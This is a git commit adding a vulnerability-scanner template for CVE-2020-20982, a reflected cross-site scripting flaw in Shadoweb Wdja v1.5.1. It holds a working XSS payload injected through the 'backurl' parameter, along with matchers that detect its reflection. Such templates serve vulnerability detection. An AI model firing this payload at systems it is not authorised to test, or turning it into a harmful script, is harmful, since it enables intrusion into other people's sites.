Create CVE-2020-20982.yaml

patch-1
PikPikcU 2021-11-22 22:56:22 +07:00 committed by GitHub
parent c04074406b
commit 8463cfd824
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 28 additions and 0 deletions

View File

@ -0,0 +1,28 @@
id: CVE-2020-20982
info:
name: Shadoweb Wdja v1.5.1 xss
author: pikpikcu
severity: medium
tags: cve,cve2020,xss,wdja
reference:
- https://github.com/shadoweb/wdja/issues/1
- https://nvd.nist.gov/vuln/detail/CVE-2020-20982
requests:
- method: GET
path:
- "{{BaseURL}}/php/passport/index.php?action=manage&mtype=userset&backurl=';alert(document.domain);//"
- "{{BaseURL}}/passport/index.php?action=manage&mtype=userset&backurl=';alert(document.domain);//"
matchers-condition: and
matchers:
- type: word
condition: and
words:
- 'alert(document.domain);//'
- type: word
part: header
words:
- 'text/html'